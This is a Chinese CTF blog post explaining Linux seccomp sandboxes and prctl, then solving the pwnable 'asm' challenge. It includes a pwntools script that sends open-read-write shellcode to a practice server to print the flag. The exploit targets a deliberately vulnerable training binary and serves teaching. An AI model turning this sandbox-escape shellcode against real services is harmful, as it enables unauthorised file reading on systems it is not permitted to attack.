



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#FFF">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">

<link rel="icon" type="image/ico" sizes="32x32" href="/images/favicon.ico">
  <meta http-equiv="Cache-Control" content="no-transform">
  <meta http-equiv="Cache-Control" content="no-siteapp">


<link rel="alternate" type="application/rss+xml" title="CTFer" href="http://example.com/rss.xml" />
<link rel="alternate" type="application/atom+xml" title="CTFer" href="http://example.com/atom.xml" />
<link rel="alternate" type="application/json" title="CTFer" href="http://example.com/feed.json" />

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Mulish:300,300italic,400,400italic,700,700italic%7CFredericka%20the%20Great:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20JP:300,300italic,400,400italic,700,700italic%7CNoto%20Serif%20SC:300,300italic,400,400italic,700,700italic%7CInconsolata:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="/css/app.css?v=0.2.5">

  

<link rel="canonical" href="http://example.com/2022/05/10/pwn-sandbox1/">



  <title>
pwn-sandbox1 |
Arashimuのblog = CTFer</title>
<meta name="generator" content="Hexo 6.1.0"></head>
<body itemscope itemtype="http://schema.org/WebPage">
  <div id="loading">
    <div class="cat">
      <div class="body"></div>
      <div class="head">
        <div class="face"></div>
      </div>
      <div class="foot">
        <div class="tummy-end"></div>
        <div class="bottom"></div>
        <div class="legs left"></div>
        <div class="legs right"></div>
      </div>
      <div class="paw">
        <div class="hands left"></div>
        <div class="hands right"></div>
      </div>
    </div>
  </div>
  <div id="container">
    <header id="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="inner">
        <div id="brand">
          <div class="pjax">
          
  <h1 itemprop="name headline">pwn-sandbox1
  </h1>
  
<div class="meta">
  <span class="item" title="Created: 2022-05-10 23:40:06">
    <span class="icon">
      <i class="ic i-calendar"></i>
    </span>
    <span class="text">Posted on</span>
    <time itemprop="dateCreated datePublished" datetime="2022-05-10T23:40:06+08:00">2022-05-10</time>
  </span>
</div>


          </div>
        </div>
        <nav id="nav">
  <div class="inner">
    <div class="toggle">
      <div class="lines" aria-label="Toggle navigation bar">
        <span class="line"></span>
        <span class="line"></span>
        <span class="line"></span>
      </div>
    </div>
    <ul class="menu">
      <li class="item title"><a href="/" rel="start">Arashimuのblog</a></li>
    </ul>
    <ul class="right">
      <li class="item theme">
        <i class="ic i-sun"></i>
      </li>
      <li class="item search">
        <i class="ic i-search"></i>
      </li>
    </ul>
  </div>
</nav>

      </div>
      <div id="imgs" class="pjax">
        <ul>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipev1x5e4j20zk0m8b29.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giclh0m9pdj20zk0m8hdt.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1giclhfehz7j20zk0m8u0x.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipetfk5zwj20zk0m8e81.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gicis081o9j20zk0m8dmr.jpg"></li>
          <li class="item" data-background-image="https://tva1.sinaimg.cn/large/6833939bly1gipexw3o58j20zk0m8e81.jpg"></li>
        </ul>
      </div>
    </header>
    <div id="waves">
      <svg class="waves" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto">
        <defs>
          <path id="gentle-wave" d="M-160 44c30 0 58-18 88-18s 58 18 88 18 58-18 88-18 58 18 88 18 v44h-352z" />
        </defs>
        <g class="parallax">
          <use xlink:href="#gentle-wave" x="48" y="0" />
          <use xlink:href="#gentle-wave" x="48" y="3" />
          <use xlink:href="#gentle-wave" x="48" y="5" />
          <use xlink:href="#gentle-wave" x="48" y="7" />
        </g>
      </svg>
    </div>
    <main>
      <div class="inner">
        <div id="main" class="pjax">
          
  <div class="article wrap">
    
<div class="breadcrumb" itemscope itemtype="https://schema.org/BreadcrumbList">
<i class="ic i-home"></i>
<span><a href="/">Home</a></span>
</div>

    <article itemscope itemtype="http://schema.org/Article" class="post block" lang="en">
  <link itemprop="mainEntityOfPage" href="http://example.com/2022/05/10/pwn-sandbox1/">

  <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="image" content="/images/avatar.jpg">
    <meta itemprop="name" content="岚沐">
    <meta itemprop="description" content=", ">
  </span>

  <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="CTFer">
  </span>

  <div class="body md" itemprop="articleBody">
    

    <h1 id="沙盒利用"><a class="markdownIt-Anchor" href="#沙盒利用">#</a> 沙盒利用</h1>
<h2 id="沙盒"><a class="markdownIt-Anchor" href="#沙盒">#</a> 沙盒</h2>
<ul>
<li>作用：沙盒 (Sandbox) 是程序运行过程中的一种隔离机制，其目的是限制不可信进程和不可信代码的访问权限</li>
</ul>
<h2 id="常见函数"><a class="markdownIt-Anchor" href="#常见函数">#</a> 常见函数</h2>
<ul>
<li>
<p><code>Secommp</code>  库：是 Linux 内核 2.6.12 版本引入的安全模块，主要是用来限制某一进程可用的系统调用 (system call)。但它本身不是一种沙盒，一种减少 Linux 内核暴露的机制，是构建一个安全的沙盒的重要组成部分。</p>
<ul>
<li>作用： <code>Seccomp</code>  在最初引入的时候只支持了 strict mode，意味着只有  <code>read ，write ，_exit ，_sigreturn</code>  四个 system call 会被允许。一旦出现其他的 system call，进程会被立刻终止 。后来又引入了 filter mode 模式，也就是 BPF，这样可调用的函数可以人为控制。</li>
<li>引入标识<figure class="highlight cpp"><figcaption data-lang="C++"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;linux/seccomp.h></span></span></pre></td></tr></table></figure></li>
<li>利用方式：调用 <code>Seccomp</code>  时，基本意味着  <code>execve</code>  这种系统调用被禁用了 ( <code>system</code>  是通过调用 <code>execve</code>  来实现的)，想通过这种方法拿到 shell 不可能。所以考虑利用其他函数来获得 flag，常用的方式就是 orw/p (open-read-write/puts) 来读出 flag (用 open 打开 flag 文件，然后读出 flag，最后向 terminal 写出 flag)</li>
</ul>
</li>
<li>
<p><code>prctl</code>  函数</p>
<ul>
<li>
<p>函数原型</p>
<figure class="highlight cpp"><figcaption data-lang="C++"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/prctl.h></span></span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token keyword">int</span> <span class="token function">prctl</span><span class="token punctuation">(</span><span class="token keyword">int</span> option<span class="token punctuation">,</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> arg2<span class="token punctuation">,</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> arg3<span class="token punctuation">,</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> arg4<span class="token punctuation">,</span> <span class="token keyword">unsigned</span> <span class="token keyword">long</span> arg5<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="3"></td><td><pre></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">//option 选项有很多，剩下的参数也由 option 确定，这里介绍两个主要的 option</span></pre></td></tr><tr><td data-num="5"></td><td><pre><span class="token comment">// PR_SET_NO_NEW_PRIVS (38) 和 PR_SET_SECCOMP (22)</span></pre></td></tr><tr><td data-num="6"></td><td><pre></pre></td></tr><tr><td data-num="7"></td><td><pre><span class="token comment">//option 为 38 的情况</span></pre></td></tr><tr><td data-num="8"></td><td><pre><span class="token comment">// 此时第二个参数设置为 1，则禁用 execve 系统调用且子进程一样受用</span></pre></td></tr><tr><td data-num="9"></td><td><pre><span class="token function">prctl</span><span class="token punctuation">(</span><span class="token number">38</span><span class="token punctuation">,</span> <span class="token number">1LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre></pre></td></tr><tr><td data-num="11"></td><td><pre><span class="token comment">//option 为 22 的情况</span></pre></td></tr><tr><td data-num="12"></td><td><pre><span class="token comment">// 只允许调用 read/write/_exit (not exit_group)/sigreturn 这几个 syscall</span></pre></td></tr><tr><td data-num="13"></td><td><pre><span class="token comment">// 第二个参数为 2，则为过滤模式，其中对 syscall 的限制通过参数 3 的结构体来自定义过滤规则。</span></pre></td></tr><tr><td data-num="14"></td><td><pre><span class="token function">prctl</span><span class="token punctuation">(</span><span class="token number">22</span><span class="token punctuation">,</span> <span class="token number">2LL</span><span class="token punctuation">,</span> <span class="token operator">&amp;</span>v1<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h2 id="常用工具"><a class="markdownIt-Anchor" href="#常用工具">#</a> 常用工具</h2>
<ul>
<li>
<p>seccomp-tools</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token function">sudo</span> <span class="token function">apt</span> <span class="token function">install</span> gcc ruby-dev</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token function">sudo</span> gem <span class="token function">install</span> seccomp-tools</pre></td></tr></table></figure><ul>
<li>
<p>常用命令</p>
<figure class="highlight shell"><figcaption data-lang="Bash"></figcaption><table><tr><td data-num="1"></td><td><pre>seccomp-tools dump file_name</pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">#查看文件哪些系统调用被禁用，哪些允许使用</span></pre></td></tr></table></figure></li>
</ul>
</li>
</ul>
<h2 id="orwp-函数参数的深入"><a class="markdownIt-Anchor" href="#orwp-函数参数的深入">#</a> orw/p 函数参数的深入</h2>
<ul>
<li>文件标识符：
<ul>
<li>默认保留的 3 个：0 - 标准输入 1 - 标准输出 2 - 标准错误</li>
<li>调用 <code>open</code>  时，文件标识符从 3 开始，每调用一次 + 1，直到 <code>close</code>  时才重置为 3</li>
</ul>
</li>
</ul>
<ul>
<li>
<p>open</p>
<ul>
<li>函数定义<figure class="highlight cpp"><figcaption data-lang="C++"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">int</span> <span class="token function">open</span><span class="token punctuation">(</span><span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span>pathname<span class="token punctuation">,</span> <span class="token keyword">int</span> oflag<span class="token punctuation">,</span> <span class="token punctuation">.</span><span class="token punctuation">.</span><span class="token punctuation">.</span> <span class="token comment">/* mode_t mode */</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">//pathname: 文件路径</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment">//oflag: 打开方式 (O_RDONLY: 只读模式、O_WRONLY: 只写模式、 O_RDWR: 读写模式)</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">// 成功返回文件句柄 ，失败返回 - 1</span></pre></td></tr></table></figure></li>
</ul>
</li>
<li>
<p>read</p>
<ul>
<li>函数定义<figure class="highlight cpp"><figcaption data-lang="C++"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">int</span> <span class="token function">read</span><span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span><span class="token keyword">void</span> <span class="token operator">*</span>buf<span class="token punctuation">,</span><span class="token keyword">int</span> len<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">//fd: 要读取的文件，如果调用了 open，可以传入文件标识符，也可以打开</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment">//*buf: 为要将读取的内容保存的缓冲区</span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">//len: 读入的长度</span></pre></td></tr></table></figure></li>
</ul>
</li>
<li>
<p>write</p>
<ul>
<li>
<p>函数定义</p>
<figure class="highlight cpp"><figcaption data-lang="C++"></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">int</span> <span class="token function">write</span> <span class="token punctuation">(</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">void</span> <span class="token operator">*</span> buf<span class="token punctuation">,</span> size_t count<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">//write () 会把参数 buf 所指的内存写入 count 个字节到参数 fd 所指的文件内。当然，文件读写位置也会随之移动.</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment">// 返回值：如果顺利 write () 会返回实际写入的字节数。当有错误发生时则返回 - 1, 错误代码存入 errno 中.</span></pre></td></tr></table></figure></li>
</ul>
</li>
<li>
<p>puts</p>
<ul>
<li>输出截断标识 <code>\x00</code></li>
</ul>
</li>
</ul>
<h2 id="例题"><a class="markdownIt-Anchor" href="#例题">#</a> 例题</h2>
<h3 id="pwnable_asm"><a class="markdownIt-Anchor" href="#pwnable_asm">#</a> pwnable_asm</h3>
<ul>
<li>
<p>分析：经典的 orw</p>
<p>题目</p>
<figure class="highlight cpp"><figcaption data-lang="C++"><span>p</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">int</span> __cdecl <span class="token function">main</span><span class="token punctuation">(</span><span class="token keyword">int</span> argc<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>argv<span class="token punctuation">,</span> <span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token operator">*</span>envp<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token punctuation">&#123;</span></pre></td></tr><tr><td data-num="3"></td><td><pre>  size_t v3<span class="token punctuation">;</span> <span class="token comment">// rdx</span></pre></td></tr><tr><td data-num="4"></td><td><pre>  <span class="token keyword">char</span> <span class="token operator">*</span>s<span class="token punctuation">;</span> <span class="token comment">// [rsp+18h] [rbp-8h]</span></pre></td></tr><tr><td data-num="5"></td><td><pre></pre></td></tr><tr><td data-num="6"></td><td><pre>  <span class="token function">setvbuf</span><span class="token punctuation">(</span><span class="token constant">stdout</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="7"></td><td><pre>  <span class="token function">setvbuf</span><span class="token punctuation">(</span><span class="token constant">stdin</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="8"></td><td><pre>  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Welcome to shellcoding practice challenge."</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="9"></td><td><pre>  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"In this challenge, you can run your x64 shellcode under SECCOMP sandbox."</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="10"></td><td><pre>  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"Try to make shellcode that spits flag using open()/read()/write() systemcalls only."</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="11"></td><td><pre>  <span class="token function">puts</span><span class="token punctuation">(</span><span class="token string">"If this does not challenge you. you should play 'asg' challenge :)"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="12"></td><td><pre>  s <span class="token operator">=</span> <span class="token punctuation">(</span><span class="token keyword">char</span> <span class="token operator">*</span><span class="token punctuation">)</span><span class="token function">mmap</span><span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">void</span> <span class="token operator">*</span><span class="token punctuation">)</span><span class="token number">0x41414000</span><span class="token punctuation">,</span> <span class="token number">0x1000uLL</span><span class="token punctuation">,</span> <span class="token number">7</span><span class="token punctuation">,</span> <span class="token number">50</span><span class="token punctuation">,</span> <span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">0LL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="13"></td><td><pre>  <span class="token function">memset</span><span class="token punctuation">(</span>s<span class="token punctuation">,</span> <span class="token number">144</span><span class="token punctuation">,</span> <span class="token number">0x1000uLL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="14"></td><td><pre>  v3 <span class="token operator">=</span> <span class="token function">strlen</span><span class="token punctuation">(</span>stub<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="15"></td><td><pre>  <span class="token function">memcpy</span><span class="token punctuation">(</span>s<span class="token punctuation">,</span> stub<span class="token punctuation">,</span> v3<span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="16"></td><td><pre>  <span class="token function">printf</span><span class="token punctuation">(</span><span class="token string">"give me your x64 shellcode: "</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="17"></td><td><pre>  <span class="token function">read</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> s <span class="token operator">+</span> <span class="token number">46</span><span class="token punctuation">,</span> <span class="token number">0x3E8uLL</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="18"></td><td><pre>  <span class="token function">alarm</span><span class="token punctuation">(</span><span class="token number">0xAu</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="19"></td><td><pre>  <span class="token function">chroot</span><span class="token punctuation">(</span><span class="token string">"/home/asm_pwn"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="20"></td><td><pre>  <span class="token function">sandbox</span><span class="token punctuation">(</span><span class="token string">"/home/asm_pwn"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="21"></td><td><pre>  <span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token keyword">void</span> <span class="token punctuation">(</span>__fastcall <span class="token operator">*</span><span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token keyword">const</span> <span class="token keyword">char</span> <span class="token operator">*</span><span class="token punctuation">)</span><span class="token punctuation">)</span>s<span class="token punctuation">)</span><span class="token punctuation">(</span><span class="token string">"/home/asm_pwn"</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="22"></td><td><pre>  <span class="token keyword">return</span> <span class="token number">0</span><span class="token punctuation">;</span></pre></td></tr><tr><td data-num="23"></td><td><pre><span class="token punctuation">&#125;</span></pre></td></tr></table></figure><p>分析题目，有 sandbox，所以开启了沙盒保护，所以先用 seccomp-tools 检查哪些系统调用被允许。</p>
<figure class="highlight shell"><figcaption data-lang="Bash"><span>l</span></figcaption><table><tr><td data-num="1"></td><td><pre>seccomp-tools dump ./asm</pre></td></tr><tr><td data-num="2"></td><td><pre>  line  CODE  JT   JF      K</pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">==</span><span class="token operator">=</span></pre></td></tr><tr><td data-num="4"></td><td><pre> 0000: 0x20 0x00 0x00 0x00000004  A <span class="token operator">=</span> arch</pre></td></tr><tr><td data-num="5"></td><td><pre> 0001: 0x15 0x00 0x09 0xc000003e  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">!=</span> ARCH_X86_64<span class="token punctuation">)</span> goto 0011</pre></td></tr><tr><td data-num="6"></td><td><pre> 0002: 0x20 0x00 0x00 0x00000000  A <span class="token operator">=</span> sys_number</pre></td></tr><tr><td data-num="7"></td><td><pre> 0003: 0x35 0x00 0x01 0x40000000  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">&lt;</span> 0x40000000<span class="token punctuation">)</span> goto 0005</pre></td></tr><tr><td data-num="8"></td><td><pre> 0004: 0x15 0x00 0x06 0xffffffff  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">!=</span> 0xffffffff<span class="token punctuation">)</span> goto 0011</pre></td></tr><tr><td data-num="9"></td><td><pre> 0005: 0x15 0x04 0x00 0x00000000  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">==</span> <span class="token builtin class-name">read</span><span class="token punctuation">)</span> goto 0010</pre></td></tr><tr><td data-num="10"></td><td><pre> 0006: 0x15 0x03 0x00 0x00000001  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">==</span> <span class="token function">write</span><span class="token punctuation">)</span> goto 0010</pre></td></tr><tr><td data-num="11"></td><td><pre> 0007: 0x15 0x02 0x00 0x00000002  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">==</span> <span class="token function">open</span><span class="token punctuation">)</span> goto 0010</pre></td></tr><tr><td data-num="12"></td><td><pre> 0008: 0x15 0x01 0x00 0x0000003c  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">==</span> <span class="token builtin class-name">exit</span><span class="token punctuation">)</span> goto 0010</pre></td></tr><tr><td data-num="13"></td><td><pre> 0009: 0x15 0x00 0x01 0x000000e7  <span class="token keyword">if</span> <span class="token punctuation">(</span>A <span class="token operator">!=</span> exit_group<span class="token punctuation">)</span> goto 0011</pre></td></tr><tr><td data-num="14"></td><td><pre> 0010: 0x06 0x00 0x00 0x7fff0000  <span class="token builtin class-name">return</span> ALLOW</pre></td></tr><tr><td data-num="15"></td><td><pre> 0011: 0x06 0x00 0x00 0x00000000  <span class="token builtin class-name">return</span> KILL</pre></td></tr></table></figure><p>发现系统允许调用 <code>read write open</code> ，所以就用 <code>orw</code> ，然后考虑我们应该把 <code>open</code>  出的 <code>flag</code>  读到哪里。注意到</p>
<p><code>s = (char *)mmap((void *)0x41414000, 0x1000uLL, 7, 50, 0, 0LL)</code> ，表明在 <code>0x41414000</code>  这里开辟了 <code>0x1000</code>  的内存大小。所以考虑读入到 <code>0x41414000</code> 。然后 payload 中使用了 <code>shellcraft</code>  模块来生成 <code>shellcode</code> 。具体怎么使用，以后在具体总结总结</p>
<p>再说一下 <code>mmap</code>  函数的作用 ( <code>mmap</code> , 从函数名就可以看出来这是 memory map, 即地址的映射，是一种内存映射文件的方法)</p>
<figure class="highlight cpp"><figcaption data-lang="C++"><span>p</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">void</span><span class="token operator">*</span> <span class="token function">mmap</span><span class="token punctuation">(</span><span class="token keyword">void</span><span class="token operator">*</span> start<span class="token punctuation">,</span>size_t length<span class="token punctuation">,</span><span class="token keyword">int</span> prot<span class="token punctuation">,</span><span class="token keyword">int</span> flags<span class="token punctuation">,</span><span class="token keyword">int</span> fd<span class="token punctuation">,</span>off_t offset<span class="token punctuation">)</span><span class="token punctuation">;</span> </pre></td></tr><tr><td data-num="2"></td><td><pre><span class="token comment">//start: 映射区的开始地址，设置为 0 时表示由系统决定映射区的起始地址。</span></pre></td></tr><tr><td data-num="3"></td><td><pre><span class="token comment">// 映射区的长度。// 长度单位是 以字节为单位，不足一内存页按一内存页处理 </span></pre></td></tr><tr><td data-num="4"></td><td><pre><span class="token comment">// 成功执行时，mmap () 返回被映射区的 指针，失败时，mmap () 返回 MAP_FAILED [其值为 (void *)-1]</span></pre></td></tr></table></figure></li>
<li>
<p>payload</p>
<figure class="highlight python"><figcaption data-lang="python"><span>n</span></figcaption><table><tr><td data-num="1"></td><td><pre><span class="token keyword">from</span> pwn <span class="token keyword">import</span> <span class="token operator">*</span></pre></td></tr><tr><td data-num="2"></td><td><pre>context<span class="token punctuation">(</span>arch<span class="token operator">=</span><span class="token string">'amd64'</span><span class="token punctuation">,</span>os<span class="token operator">=</span><span class="token string">'Linux'</span><span class="token punctuation">,</span>log_level<span class="token operator">=</span><span class="token string">'debug'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="3"></td><td><pre>p<span class="token operator">=</span>remote<span class="token punctuation">(</span><span class="token string">'node4.buuoj.cn'</span><span class="token punctuation">,</span><span class="token string">'27383'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="4"></td><td><pre>elf<span class="token operator">=</span>ELF<span class="token punctuation">(</span><span class="token string">'./asm'</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="5"></td><td><pre>offset<span class="token operator">=</span><span class="token number">0x41414000</span></pre></td></tr><tr><td data-num="6"></td><td><pre>payload<span class="token operator">=</span><span class="token string">''</span></pre></td></tr><tr><td data-num="7"></td><td><pre>payload<span class="token operator">=</span>shellcraft<span class="token punctuation">.</span><span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">'flag'</span><span class="token punctuation">)</span><span class="token operator">+</span>shellcraft<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token number">3</span><span class="token punctuation">,</span>offset<span class="token punctuation">,</span><span class="token number">0x100</span><span class="token punctuation">)</span><span class="token operator">+</span>shellcraft<span class="token punctuation">.</span>write<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">,</span>offset<span class="token punctuation">,</span><span class="token number">0x100</span><span class="token punctuation">)</span></pre></td></tr><tr><td data-num="8"></td><td><pre>payload<span class="token operator">=</span>asm<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="9"></td><td><pre>p<span class="token punctuation">.</span>sendline<span class="token punctuation">(</span>payload<span class="token punctuation">)</span></pre></td></tr><tr><td data-num="10"></td><td><pre>p<span class="token punctuation">.</span>interactive<span class="token punctuation">(</span><span class="token punctuation">)</span></pre></td></tr></table></figure></li>
</ul>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">Edited on</span>
    <time title="Modified: 2022-05-11 09:55:15" itemprop="dateModified" datetime="2022-05-11T09:55:15+08:00">2022-05-11</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> Donate</button>
  <p>Give me a cup of [coffee]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="岚沐 WeChat Pay">
        <p>WeChat Pay</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="岚沐 Alipay">
        <p>Alipay</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="岚沐 PayPal">
        <p>PayPal</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>Post author:  </strong>岚沐 <i class="ic i-at"><em>@</em></i>CTFer
  </li>
  <li class="link">
    <strong>Post link: </strong>
    <a href="http://example.com/2022/05/10/pwn-sandbox1/" title="pwn-sandbox1">http://example.com/2022/05/10/pwn-sandbox1/</a>
  </li>
  <li class="license">
    <strong>Copyright Notice:  </strong>All articles in this blog are licensed under <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC9kZWVkLnpo"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> unless stating additionally.
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/2022/05/08/hello-world/" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipevarprfj20zk0m8npd.jpg" title="Hello World">
  <span class="type">Previous Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Hello World</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/2022/05/17/Misc1/" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;tva1.sinaimg.cn&#x2F;mw690&#x2F;6833939bly1gipewr8iypj20zk0m8b29.jpg" title="Misc1">
  <span class="type">Next Post</span>
  <span class="category"><i class="ic i-flag"></i> </span>
  <h3>Misc1</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="Contents">
